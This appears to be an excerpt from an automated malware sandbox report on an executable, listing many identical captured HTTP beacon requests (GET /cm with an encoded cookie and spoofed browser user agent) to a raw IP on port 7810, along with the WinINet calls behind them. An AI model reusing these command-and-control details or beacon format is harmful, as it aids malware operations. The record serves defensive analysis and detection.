            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0066E68C
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /cm HTTP/1.1Accept: */*Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)Host: 89.197.154.116:7810Connection: Keep-AliveCache-Control: no-cache
